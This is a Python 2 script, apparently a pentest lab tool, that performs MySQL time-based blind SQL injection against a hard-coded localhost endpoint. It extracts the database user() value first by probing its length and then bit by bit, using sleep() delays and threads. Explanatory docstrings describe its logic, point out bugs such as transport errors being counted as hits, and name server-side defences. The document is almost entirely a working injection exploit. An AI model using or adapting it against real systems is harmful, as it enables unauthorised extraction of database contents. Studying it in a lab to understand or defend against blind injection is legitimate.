mysql延时注入脚本_py延迟注入SQL脚本

#!/usr/bin/env python
#-*- coding: utf-8 -*-
#延迟注入工具

import urllib2
import time
import socket
import threading
import requests


class my_threading(threading.Thread):
    """Worker that probes one bit of one character of the injected query result.

    Constructor arguments (kept under the original names):
      str -- bit position, 1..8, as handed in by getData(); note that the
             parameter shadows the builtin only inside __init__.
      x   -- 1-based character position inside the value being extracted.

    run() builds the fixed probe URL against the local test target, fetches
    it through request(), and stores its verdict in the module-global ``res``
    dict under key ``str(self.str)``: 1 when request() returned 'timeout',
    otherwise 0. Nothing here is synchronised; the caller is expected to
    join() every worker before reading ``res``.

    Detection note: the only signal the probe consumes is response latency
    (a server-side sleep(2) versus the 2-second client timeout in
    request()), so query-latency monitoring and input validation on the
    ``username`` parameter are the controls that matter on the server side.
    """

    def __init__(self, str, x):
        threading.Thread.__init__(self)
        self.str = str
        self.x = x

    def run(self):
        global res
        bit_pos = self.str
        char_pos = self.x
        # Probe URL is hard-coded to the local test endpoint; the two
        # interpolated values select the character and the bit to test.
        url = ("http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29,"
               + str(char_pos)
               + ",1%29%29%29,8,0%29,"
               + str(bit_pos)
               + ",1%29%29,sleep%282%29,0%29%23")
        page = request(url)
        # request() returns the literal 'timeout' on *any* exception, so a
        # transport error is recorded as a 1 just like a real delay would be.
        res[str(bit_pos)] = 1 if 'timeout' in page else 0

def request(URL):
    """Fetch URL with a fixed desktop User-Agent and a 2-second socket timeout.

    Returns the response body on success. On any exception raised by
    urlopen (timeout, connection refused, HTTP error, ...) it sleeps for
    2 seconds and returns the literal string 'timeout', which every caller
    in this file interprets as "the injected sleep() fired". Transport
    failures are therefore indistinguishable from positive probes.
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, headers)
    try:
        resp = urllib2.urlopen(req, timeout=2)
    except Exception:
        time.sleep(2)
        return 'timeout'
    return resp.read()


def curl(url):
    """Timing helper that is not called anywhere in this file.

    Issues a GET via requests and returns int(time.clock()) taken *after*
    the call -- the end reading, not the elapsed time, so the measured
    duration is never returned. On requests.RequestException it prints a
    message and calls exit(). time.clock() was removed in Python 3.8.
    """
    try:
        t0 = time.clock()
        requests.get(url)
        t1 = time.clock()
        return int(t1)
    except requests.RequestException:
        print(u"访问出错!")
        exit()


def getLength():
    """Probe i = 0, 1, 2, ... until request() reports 'timeout', then return i.

    Each probe asks the server to sleep when length(...) equals i. The
    matching i is printed and returned. There is no upper bound, so a
    target that never delays (and never errors) loops forever.
    """
    i = 0
    while True:
        print("[+] Checking: %s \r" % i)
        url = ("http://localhost/pentest/1.php?username=root'+and+sleep(if(length((select%20user()))="
               + str(i)
               + ",1,0))%23")
        if 'timeout' in request(url):
            print(u"[+] 数据长度为: %s" % i)
            return i
        i += 1

def bin2dec(string_num):
    """Parse a string of '0'/'1' characters as a base-2 integer.

    Raises ValueError for anything int(..., 2) rejects (empty string,
    non-binary digits).
    """
    return int(string_num, 2)


def getData(dataLength):
    """Recover dataLength characters, one character per round of 8 workers.

    For each 1-based character position, eight my_threading workers are
    created (one per bit, which they record under keys '1'..'8' of the
    module-global ``res``), marked daemon, started and joined. The eight
    bits are concatenated in key order, converted with bin2dec(), and the
    resulting chr() is printed and appended to the output. ``res`` is reset
    to {} after every character. Finishes by printing "[+] ok!" and the
    assembled string; returns None.
    """
    global res
    data = ""
    for char_idx in range(dataLength):
        char_pos = char_idx + 1
        workers = [my_threading(bit + 1, char_pos) for bit in range(8)]
        for w in workers:
            w.setDaemon(True)
        for w in workers:
            w.start()
        # All eight verdicts must be in before ``res`` is read below.
        for w in workers:
            w.join()
        bits = "".join(str(res[str(bit + 1)]) for bit in range(8))
        res = {}
        ch = chr(bin2dec(bits))
        print(ch)
        data = data + ch
    print("[+] ok!")
    print("[+] result:" + data)


if __name__ == '__main__':
    stop = False  # never read; kept from the original script
    res = {}
    length = getLength()
    getData(length)
